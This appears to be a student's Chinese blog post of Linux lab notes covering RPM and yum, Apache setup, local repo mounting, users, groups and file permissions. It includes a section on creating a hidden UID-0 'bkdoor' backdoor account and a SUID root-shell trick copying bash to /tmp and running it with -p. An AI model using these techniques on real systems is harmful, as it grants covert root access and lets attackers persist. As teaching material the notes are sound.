实验:软件包管理与权限管理相关步骤:

Posted on 2022-02-09 19:52  初墨*  阅读(182)  评论(0)    收藏  举报

~Centos7中下载QQlinux版本步骤:

火狐打开百度输入qq下载——下载——QQLinux版本——x64栏勾选rpm——保存文件——打开下载界面文件夹——右击打开终端——ls——rpm -ivh linux+tab键——桌面上方应用程序——互联网——腾讯QQ

 

 

 

~查询RPM软件包信息

1.rpm -qa | grep qq //查看QQ版本

rpm -qa ^C

rpm -qi linuxqq + tab //查询QQ名称、版本、许可 协议、用途描述等详细信息

rpm -q python //查看python安装版本

rpm -evh linuxqq + tab //卸载rpm软件包

2.Linux查询命令:

find 查询位置 查询条件

which 查询命令安装位置

 

 

~Centos7中启动apache服务步骤:

yum repolist //用来查看软件包仓库有多少软件

yum install terminal

yum install httpd //安装apache

service start httpd

systemctl status httpd.service //检查状态信息

systemctl start httpd //启动

火狐输入网址:http://127.0.0.1

 

 

 

 

~kali中启动apache2步骤:

(Kali账户、密码:kali)

apt

apt install apache2

apt-get install apache2

systemctl start apache2

firefox

apt-get install apache2

火狐中输入网址:http://127.0.0.1

 

 

 

 

 

~本地yum源镜像挂载步骤:

~挂载镜像文件到虚拟机

~挂载镜像文件到/iso目录下 mount /dev/sr0 /iso (/dev/sr0 代表光驱设备)

~配置repo文件并清除缓存

centos7中打开桌面终端

mkdir /iso

mount

ls /dev/sr0

cd /iso/

ls

cd ..

mount /dev/sr0 /iso

cd /iso

ls

cd Packages/

ls | wc -l

cd /etc/yum.repos.d/

vi repo.repo

((编写:[yum]

name=zjx

baseurl=file:///iso

enable=1

gpgcheck 0

:wq))

yum clean all

yum repolist

 

 

 

 

继上一步骤之后进行

~创建Linux后门账号步骤:

yum list mariadb.x86_64 1:5.5.64-1.el7

yum - y remove mysql

wget http://mirrors.163.com/.help/CentOS6-Base-163.repo

ls

cat CentOS6-Base-163.repo

cd

head - 10 /etc/passwd (#passwd 更改用户密码)

cat /etc/passwd

head - 1 /etc/shadow

cat /etc/shadow

man useradd

useradd test

id test

grep test /etc/passwd /etc/shadow /etc/group

passwd test (test密码:Zjx.@123456)

grep test /etc/passwd /etc/shadow /etc/group

(新的终端窗口)

mkdir /home/backup

echo $0

which bash

ls - l /usr/bin/bash (# /bin/bash 正常的shell环境)

(原窗口)

useradd - c root - o - u 0 - g root - G root - d /home/backup - s /bin/bash bkdoor

id bkdoor

echo Zjx.@123456 | passwd -- stdin bkdoor

useradd - s /sbin/nologin bkdoor (# /sbin/nologin 不允许用户登录)

usermod - s /sbin/nologin bkdoor

tail - 1 /etc/passwd

usermod - d /iso

mkdir /homee

usermod - d /homee bkdoor

tail - 1 /etc/passwd

ps

ps - au bkdoor

ps - aux bkdoor

userdel - r test

groupadd tests

grep tests /etc/group

groupdel tests

id bkdoor

 

 

 

 

 

~SUID权限实验步骤:

创建一个名为test的文本文档

终端输入命令sudo chmod 777 test(用于修改文件权限为-rwxrwxrw-)

chmod o- x test

ls -l

chmod u- x test

ls -l

chmod g- x test

ls -l

chmod o+x test

ls -l

id bkdoor

chown bkdoor test

ls -l

su bkdoor

usermod -s /bin/bash bkdoor

su bkdoor

bash- 4.2# ls

pwd

id

touch ceshi

ls -l

useradd test

echo Zjx.@123456 | passwd -- stdin test

su test

whoami

cd

touch zz

ll

exit

ls

cd /home

ls

cd test

ls

ll

chown root zz

ll

chown .root zz

ll

which passwd

chmod o+s /usr/bin/passwd

ll /usr/bin/passwd

chmod u+s /usr/bin/passwd

chmod o+s /bin/bash

cp /bin/bash /tmp

ls /tmp/bash

ll /tmp/bash

chmod o+s /tmp/bash

ll /tmp/bash

chmod u+s /tmp/bash

ll /tmp/bash

su test

cd /tmp

ls | grep bash

./bash

whoami

exit

./bash - p

id

whoami

 

 

 

 

 

 内容总结:

1. RPM命令格式:
man rpm——命令可以获得关于rmp命令的详细帮助信息

2. 查询已安装的RPM软件信息
rpm -q【子选项】【软件名】
● -qa:显示当前系统中以RPM方式安装的所有软件列表
● -qi:查看指定软件包的名称、版本、许可协议、用途描述等详细信息
● -ql:显示指定的软件包在当前系统中安装的所有目录、文件列表
● -qf:查看当前指定的文件或目录是由哪个软件包所安装的
直接执行‘rpm -qa’命令将列出当前操作系统中以RPM方式安装的所有软件包清单

3. 结合管道符和‘wc -l’命令统计系统中以安装的RPM软件的个数
rpm -qa | wc -l

4. 查询某个软件包(python)是否已经安装
rpm -q 软件名称(python)

5. 不知道准确的软件包名称,还可以对全部查询结果进行过滤
rpm -qa | grep -i python

6. 想知道已安装的某个软件的用途,可以使用
rpm -qi 软件名

7. 查看某个软件包安装的目录和文件清单时,可以使用
rpm -ql 软件名(wget)

8. 系统中的某一个文件是由哪个软件生成
先找到vim程序位置——which vim
rpm -qf /usr/bin/vim

9. 查询未安装的RPM软件包文件中信息
使用“-qp”选项时,必须以RPM软件包文件的路径作为参数(可以有多个),而不是软件包名称
● -qpi: 查看指定软件包的名称、版本、许可协议、用途描述等详细信息
● -qpl: 显示指定的软件包准备要安装的所有目录、文件列表

10. 安装、升级、卸载RPM软件包
● -i:在当前系统中安装一个新的RPM软件包-e:卸载指定名称的软件包
● -U:检查并升级系统中的某个软件包,若该软件包原来并未安装,则等同于“-i”选项
● -F:检查更新系统中的某个软件包,若该软件包原来并未安装,则放弃安装
● -h:在安装或升级软件包的过程中,以“#”号显示安装进度
● -v:显示软件安装过程中的详细信息
● --force:强制安装某个软件包
● --nodeps:在安装或升级、卸载一个软件包时,不检查与其他软件包的依赖关系
● -e 软件名称:卸载软件包

11. [LinuxRPM](节点名称)
name=RPM(仓库的描述)
baseurl=(本地file、HTTP、FTP、NFS)仓库文件的路径
enabled=1(启用仓库)
gpgcheck=1(启用签名校验)(生产环境中一般需要打开)

12. 更新yum库
yum makecache
软件安装
yum provides *bin/软件 查找软件的包名
yum -y install 包名 安装软件,-y是参数自动确定
yum -y reinstall 包名 重新安装
yum -y update 包名 升级一个软件
yum -y update 更新所有软件
查询
yum list 包名 查看安装包的位置
卸载
yum -y remove 包名 卸载软件

13. 创建用户的命令是useradd

14.创建用户new备注用户为test,指定用户uid为600,用户的组初始组为test,用户次要组为yuchen,指定用户的失效日期(注意这里的失效日期也是需要通过1970年1月1日进行换算)、指定用户的过期天数
useradd -c test -u 600 -g test -G yuchen -e 18811 -f 10 new

15.创建系统用户old
useradd -r old

16. 创建不允许登入的用户
useradd -s /sbin/nologin good

17.创建用户家目录
mkdir -p /test/home

18. 创建用户并指定家目录
useradd -d /test/home/testuser testuser

19.删除用户——userdel

20. 不加参数删除用户——userdel testuser

21. 删除用户同时删除用户的家目录和邮件通知目录——userdel -r test

22. 创建用户组——groupadd groupname

23.删除用户组——groupdel groupname

24.修改用户组名——groupmod -h newname oldname
修改用户组ID——groupmod -g newgid oldgid

25.文件权限的查看命令——ls -l

26.● ls -l 所包含的信息
(1)权限信息 (-rw-r--r-- )
一共有10位
a.第一位:表示文件信息
-:表示普通文件
d:表示目录
l:表示软连接(快捷方式)
b:设备
p:管道文件
b.第2-4这三位表示属主的权限 -----------------》字母u代替
-:表示没有权限
r:读取文件的权限
w:修改文件的权限
x:执行文件的权限
c.第5-7这三位表示属组的权限-------------------》字母g代替
-:表示没有权限
r:读取文件的权限
w:修改文件的权限
x:执行文件的权限
d.第8-10这三位表示其他人的权限----------------》字母o代替
-:表示没有权限
r:读取文件的权限
w:修改文件的权限
x:执行文件的权限

27.修改权限命令关键词——chmod(change mod)
a. 修改属主权限:chmod u+x 文件路径(追加权限)或者chmod u=r 文件路径(覆盖权限)

b. 修改属组权限:与属主权限的修改类似,可以使用(‘+’,‘-’)号进行权限的修改,也可以使用赋值的方式。
chmod g+rw 文件路径
chmod g=--- 文件路径 (此处也可以用一个‘-’表示)

c. 修改其他人的权限:同以上修改权限的方法相同
chmod o=rwx 文件路径
chnod o-x 文件路径

d. 写文件的权限
vim编辑器用于打开文件并进行编辑,vim 文件路径 ------》a或者i进入编辑模式----------》进行编辑------ -》esc退出编辑模式-------》:(shift+:)-------》wq保存文件
如果存在w的权限则可以进行编辑,如果没有就不可以。
注:如果一个人没有读的权限但有写的权限,当他每次写完后,会把文件中原先的内容覆盖掉。

e. 执行可执行文件的权限(x)
注:执行命令有以下的方式
./文件路径
sh 文件路径
bash 文件路径

f. 将用户添加到组,从而拥有组权限

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

博客园  ©  2004-2026
浙公网安备 33010602011771号 浙ICP备2021040463号-3